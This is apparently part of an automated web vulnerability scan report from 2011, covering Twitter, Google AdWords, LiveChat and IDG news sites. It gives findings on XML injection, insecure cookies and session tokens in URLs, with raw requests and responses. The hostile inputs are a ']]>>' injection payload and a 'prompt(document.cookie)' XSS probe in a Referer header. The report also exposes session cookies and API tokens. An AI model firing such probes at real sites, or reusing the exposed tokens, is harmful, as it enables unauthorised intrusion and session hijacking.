Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sun, 04 Sep 2011 12:13:01 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/images]]>>/t.gif</Key><RequestId>0256C93CE920E471</RequestId>
...[SNIP]...

5.3. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform.twitter.com
Path:	/widgets/images/t.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images/t.gif]]>>?_=1315138412470&count=horizontal&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.scmagazine.com.au%2FNews%2F268907%2Ckaspersky-website-vulnerable-to-xss.aspx&text=Kaspersky%20website%20vulnerable%20to%20XSS&url=http%3A%2F%2Fwww.scmagazine.com.au%2FNews%2F268907%2Ckaspersky-website-vulnerable-to-xss.aspx&via=SCMagazineAU&twttr_referrer=http%3A%2F%2Fwww.scmagazine.com.au%2FNews%2F268907%2Ckaspersky-website-vulnerable-to-xss.aspx&twttr_li=0&twttr_widget=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sun, 04 Sep 2011 12:13:05 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/images/t.gif]]>></Key><RequestId>DFF72AF93C8CCC6B</RequestId>
...[SNIP]...

6. SSL cookie without secure flag set previous next
There are 3 instances of this issue:

https://api.twitter.com/1/statuses/user_timeline.json
https://adwords.google.com/um/StartNewLogin
https://chat.livechatinc.net/licence/1019931/open_chat.cgi

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

6.1. https://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlMzY4MTAzMzIwYTU0MDNmOWJkMThiMGViOWU3OTE3%250ANWE6DnJldHVybl90byIcaHR0cDovL3R3aXR0ZXIuY29tL2hvbWU6D2NyZWF0%250AZWRfYXRsKwjJkXE0MgE6B2lkIiUyODllZjM2MmI5OWI5NTZkZDBiMjU4MTdh%250ANTAwY2M4NSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZs%250AYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a7841198548fdcba151b3dfbcb0ca8bd6f7910f3; domain=.twitter.com; path=/; HttpOnly
guest_id=v1%3A131514479476958541; domain=.twitter.com; path=/; expires=Wed, 04 Sep 2013 01:59:54 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json HTTP/1.1
Host: api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 401 Unauthorized
Date: Sun, 04 Sep 2011 13:59:54 GMT
Server: hi
Status: 401 Unauthorized
WWW-Authenticate: OAuth realm="https://api.twitter.com"
X-Transaction: 1315144794-10009-14501
X-RateLimit-Limit: 150
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 13:59:54 GMT
X-RateLimit-Remaining: 145
X-Runtime: 0.00769
Content-Type: application/json; charset=utf-8
Content-Length: 94
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 5851e30626f442af25c9804630bcd035323e3a80
X-RateLimit-Reset: 1315148208
Set-Cookie: guest_id=v1%3A131514479476958541; domain=.twitter.com; path=/; expires=Wed, 04 Sep 2013 01:59:54 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlMzY4MTAzMzIwYTU0MDNmOWJkMThiMGViOWU3OTE3%250ANWE6DnJldHVybl90byIcaHR0cDovL3R3aXR0ZXIuY29tL2hvbWU6D2NyZWF0%250AZWRfYXRsKwjJkXE0MgE6B2lkIiUyODllZjM2MmI5OWI5NTZkZDBiMjU4MTdh%250ANTAwY2M4NSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZs%250AYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a7841198548fdcba151b3dfbcb0ca8bd6f7910f3; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close

{"error":"This method requires authentication.","request":"\/1\/statuses\/user_timeline.json"}

6.2. https://adwords.google.com/um/StartNewLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: S=photos_html=P6Bw9eJf2CgEgrvPvA9HEQ:adwords-usermgmt=8m8diCZnA629VzN_ZVvlPg; Domain=.google.com; Path=/; Secure; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 12
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 13:59:52 GMT
Expires: Sun, 04 Sep 2011 13:59:52 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

6.3. https://chat.livechatinc.net/licence/1019931/open_chat.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://chat.livechatinc.net
Path:	/licence/1019931/open_chat.cgi

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

__livechat=lc_session%3DS1315144570.6ab74cb2ef%26lc_last_visit%3D1315144882%26lc_visit_number%3D1%26lc_page_view%3D22%26lc_nick%3D%24%26lc_lang%3Den%26lc_chat_number%3D0%26lc_all_invitation%3D0%26lc_ok_invitation%3D0%26lc_last_operator_id%3D%24%26lc_client_version%3D%24%26lc_last_conference_id%3D%24b3903f48b26168d2f6db61bf; expires=Tue, 03-Sep-2013 16:01:31 GMT; path=/licence/1019931; domain=chat.livechatinc.net; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licence/1019931/open_chat.cgi?groups=1&s=1&lang=en&dc=SESSdede027f997e7b165588bf3c431a00ec%3Dq25voncnf657rngjhpsai5d5p6%3B%20s_SupportDivison%3DCorporate%2520Support%3B%20has_js%3D1%3B%20s_cc%3Dtrue%3B%20gpv_pageName%3DSupport%2520%257C%2520Corporate%2520Support%2520%257C%2520Open%2520a%2520Support%2520Case%3B%20s_nr%3D1315144694450-New%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20__utma%3D38548641.275004050.1315144606.1315144606.1315144606.1%3B%20__utmb%3D38548641.10.10.1315144606%3B%20__utmc%3D38548641%3B%20__utmz%3D38548641.1315144606.1.1.utmcsr%3Dusa.kaspersky.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/about-us/contact-us%3B%20__utmv%3D38548641.anonymous%2520user%7C1%3DUser%2520roles%3Danonymous%2520user%3D1%3Bl%3Dhttp%3A//support.kasperskyamericas.com/corporate/live-chat%3Br%3Dundefined%3Bs%3Dundefined HTTP/1.1
Host: chat.livechatinc.net
Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/live-chat
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __livechat=lc_session%3DS1315144570.6ab74cb2ef%26lc_last_visit%3D1315144651%26lc_visit_number%3D1%26lc_page_view%3D4%26lc_nick%3D%24%26lc_lang%3Den%26lc_chat_number%3D0%26lc_all_invitation%3D0%26lc_ok_invitation%3D0%26lc_last_operator_id%3D%24%26lc_client_version%3D%24%26lc_last_conference_id%3D%24

Response

HTTP/1.1 200 OK
Content-type: text/html;
Set-Cookie: __livechat=lc_session%3DS1315144570.6ab74cb2ef%26lc_last_visit%3D1315144882%26lc_visit_number%3D1%26lc_page_view%3D22%26lc_nick%3D%24%26lc_lang%3Den%26lc_chat_number%3D0%26lc_all_invitation%3D0%26lc_ok_invitation%3D0%26lc_last_operator_id%3D%24%26lc_client_version%3D%24%26lc_last_conference_id%3D%24b3903f48b26168d2f6db61bf; expires=Tue, 03-Sep-2013 16:01:31 GMT; path=/licence/1019931; domain=chat.livechatinc.net; HttpOnly
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 2095
Connection: Keep-Alive

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Welcome to LiveChat</title>
<link rel="stylesheet" href="/server/css/style.css">
<!--[if lte IE 8]><link rel="stylesheet" href="/server/css/
...[SNIP]...

7. Session token in URL previous next
There are 25 instances of this issue:

http://api.brightcove.com/services/library
http://api.demandbase.com/api/v1/ip.json
http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
http://l.sharethis.com/pview
http://users.techtarget.com/registration/searchsecurity/LoginRegister.page
http://users.techtarget.com/registration/searchsecurity/Logout.page
http://www.blogger.com/comment-iframe.g
http://www.cfoworld.com/
http://www.cio.com/
http://www.computerworld.com/
http://www.computerworld.com/s/newsletters
http://www.computerworld.com/secure-us.imrworldwide.com/cgi-bin/m
http://www.computerworld.com/spring/newsletter/1004/Computerworld%20Daily/
http://www.computerworld.com/spring/newsletter/1019/Networking/
http://www.computerworld.com/spring/newsletter/1021/Operating%20System/
http://www.computerworld.com/spring/newsletter/1025/Security/
http://www.computerworld.com/spring/newsletter/1028/The%20Weekly%20Top%2010/
http://www.csoonline.com/
http://www.cwsubscribe.com/cgi-win/cw.cgi
http://www.facebook.com/extern/login_status.php
http://www.infoworld.com/
http://www.itworld.com/
http://www.javaworld.com/
http://www.networkworld.com/
http://www2.maas360.com/common/chat/FL_ChatManager.js

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

7.1. http://api.brightcove.com/services/library previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://api.brightcove.com
Path:	/services/library

Issue detail

The URL in the request appears to contain a session token within the query string:

http://api.brightcove.com/services/library?command=find_all_videos&sort_by=publish_date&sort_order=desc&page_size=5&token=V7vAFauRDQbxjY3C5ovVuOi0forVC-LqC8uZc6lCntw.&callback=jsonp1315147646353&_=1315147660456

Request

GET /services/library?command=find_all_videos&sort_by=publish_date&sort_order=desc&page_size=5&token=V7vAFauRDQbxjY3C5ovVuOi0forVC-LqC8uZc6lCntw.&callback=jsonp1315147646353&_=1315147660456 HTTP/1.1
Host: api.brightcove.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Sun, 04 Sep 2011 10:36:47 EDT
Cache-Control: must-revalidate,max-age=0
Content-Type: application/json;charset=UTF-8
Content-Length: 28704
Date: Sun, 04 Sep 2011 14:47:03 GMT
Server:

jsonp1315147646353({"items":[{"id":1142279787001,"name":"IFA: Samsung Galaxy Tab 7.7 vanishes from IFA booth","adKeys":null,"shortDescription":"Just days after introducing it at the consumer electroni
...[SNIP]...

7.2. http://api.demandbase.com/api/v1/ip.json previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://api.demandbase.com
Path:	/api/v1/ip.json

Issue detail

The URL in the request appears to contain a session token within the query string:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=OPG.Demandbase.dbase_parse

Request

GET /api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=OPG.Demandbase.dbase_parse HTTP/1.1
Host: api.demandbase.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Api-Version: v2
Content-Type: application/javascript;charset=utf-8
Date: Sun, 04 Sep 2011 12:16:01 GMT
Server: nginx/1.0.4
Status: 200 OK
Vary: Accept-Encoding
Content-Length: 77
Connection: keep-alive

OPG.Demandbase.dbase_parse({"maxmind_zip_code":"75207","ip":"50.23.123.106"})

7.3. http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://blogs.computerworld.com
Path:	/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=OPG.Demandbase.dbase_parse

Request

GET /18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack HTTP/1.1
Host: blogs.computerworld.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

7.4. http://l.sharethis.com/pview previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://l.sharethis.com
Path:	/pview

Issue detail

The URL in the request appears to contain a session token within the query string:

http://l.sharethis.com/pview?event=pview&source=share5x&publisher=8e715100-b8ff-4c58-a408-06e562ec6acd&hostname=www.spamfighter.com&location=%2FNews-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm&url=http%3A%2F%2Fwww.spamfighter.com%2FNews-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm&sessionID=1315138414542.58266&fpc=c7020f2-132345ba7cf-5b507daf-1&ts1315138414557.0&refDomain=www.google.com&refQuery=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db

Request

GET /pview?event=pview&source=share5x&publisher=8e715100-b8ff-4c58-a408-06e562ec6acd&hostname=www.spamfighter.com&location=%2FNews-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm&url=http%3A%2F%2Fwww.spamfighter.com%2FNews-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm&sessionID=1315138414542.58266&fpc=c7020f2-132345ba7cf-5b507daf-1&ts1315138414557.0&refDomain=www.google.com&refQuery=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.spamfighter.com/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Sun, 04 Sep 2011 12:12:57 GMT
Connection: keep-alive

7.5. http://users.techtarget.com/registration/searchsecurity/LoginRegister.page previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/LoginRegister.page

Issue detail

The response contains the following links that appear to contain session tokens:

http://users.techtarget.com/registration/searchsecurity/Authenticate.page?fromURL=http%3A%2F%2Fusers.techtarget.com%2Fregistration%2Fsearchsecurity%2FLoginRegister.page&securityToken=6aZqKwgBnxs%253D

Request

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
Location: http://users.techtarget.com/registration/searchsecurity/Authenticate.page?fromURL=http%3A%2F%2Fusers.techtarget.com%2Fregistration%2Fsearchsecurity%2FLoginRegister.page&securityToken=6aZqKwgBnxs%253D
Content-Type: text/html; charset=UTF-8
Content-Length: 237
Connection: close
Date: Sun, 04 Sep 2011 14:04:44 GMT

The URL has moved <a href="http://users.techtarget.com/registration/searchsecurity/Authenticate.page?fromURL=http%3A%2F%2Fusers.techtarget.com%2Fregistration%2Fsearchsecurity%2FLoginRegister.page&securityToken=6aZqKwgBnxs%253D">here</a>
...[SNIP]...

7.6. http://users.techtarget.com/registration/searchsecurity/Logout.page previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/Logout.page

Issue detail

The response contains the following links that appear to contain session tokens:

http://users.techtarget.com/registration/searchsecurity/DeleteTokens.page?fromURL=http%3A%2F%2Fsearchsecurity.techtarget.com&requestDomain=http%3A%2F%2Fwhatis.techtarget.com%2Flogout%2F1%2C%2Csid9%2C00.html%3FNextURL%3D&tokenType=LOGIN

Request

GET /registration/searchsecurity/Logout.page HTTP/1.1
Host: users.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
Location: http://users.techtarget.com/registration/searchsecurity/DeleteTokens.page?fromURL=http%3A%2F%2Fsearchsecurity.techtarget.com&requestDomain=http%3A%2F%2Fwhatis.techtarget.com%2Flogout%2F1%2C%2Csid9%2C00.html%3FNextURL%3D&tokenType=LOGIN
Content-Type: text/html; charset=UTF-8
Content-Length: 273
Connection: close
Date: Sun, 04 Sep 2011 14:04:46 GMT

The URL has moved <a href="http://users.techtarget.com/registration/searchsecurity/DeleteTokens.page?fromURL=http%3A%2F%2Fsearchsecurity.techtarget.com&requestDomain=http%3A%2F%2Fwhatis.techtarget.com%2Flogout%2F1%2C%2Csid9%2C00.html%3FNextURL%3D&tokenType=LOGIN">here</a>
...[SNIP]...

7.7. http://www.blogger.com/comment-iframe.g previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.blogger.com
Path:	/comment-iframe.g

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.blogger.com/comment-iframe.g?blogID=722867207364741287&postID=592838557471184169&blogspotRpcToken=2450440

Request

GET /comment-iframe.g?blogID=722867207364741287&postID=592838557471184169&blogspotRpcToken=2450440 HTTP/1.1
Host: www.blogger.com
Proxy-Connection: keep-alive
Referer: http://www.cloudscan.me/2010/12/usakaperskycom-cross-site-scripting-xss.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=150635877.1878220356.1314847150.1314847150.1314984268.2; __utmz=150635877.1314984268.2.2.utmcsr=helicontech.blogspot.com|utmccn=(referral)|utmcmd=referral|utmcct=/2009/03/using-helicon-ape-under-iis6-windows.html

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Sun, 04 Sep 2011 12:58:12 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 17934
Set-Cookie: S=blogger=MRgQ-9V12L9mw4tTYIuyxg; Domain=.blogger.com; Path=/; HttpOnly
Server: GSE

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><title>Blogger: HTTPi, SQLi, XSS.CX - Post a Comment</title>
<link href="http://www.blog
...[SNIP]...

7.8. http://www.cfoworld.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.cfoworld.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=3d68d549e3aef54ccf4ddf405831970ea8380f3a&callback=OPG.Demandbase.dbase_parse

Request

GET / HTTP/1.1
Host: www.cfoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:06:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Drupal-Cache: HIT
Etag: "1315144837-0"
Cache-Control: public, max-age=0
Last-Modified: Sun, 04 Sep 2011 14:00:37 GMT
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_dgpxpsme=44593ca729a0;expires=Sun, 04-Sep-11 14:16:23 GMT;path=/
Content-Length: 49933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=3d68d549e3aef54ccf4ddf405831970ea8380f3a&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...

7.9. http://www.cio.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.cio.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=bacca8eba8bded95b5dd46f7a3d8ebc282966537&callback=dbase_parse

Request

GET / HTTP/1.1
Host: www.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.10. http://www.computerworld.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.computerworld.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse

Request

GET / HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.11. http://www.computerworld.com/s/newsletters previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.computerworld.com
Path:	/s/newsletters

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse

Request

GET /s/newsletters HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en
Content-Type: text/html; charset=UTF-8
Eirxpes: Sun, 04 Sep 2011 14:16:27 GMT
Cneonction: close
chCae-Control: private
ETag: "KXAOEEJGPLXZMRYXL"
Expires: Sun, 04 Sep 2011 14:06:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:06:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...

7.12. http://www.computerworld.com/secure-us.imrworldwide.com/cgi-bin/m previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.computerworld.com
Path:	/secure-us.imrworldwide.com/cgi-bin/m

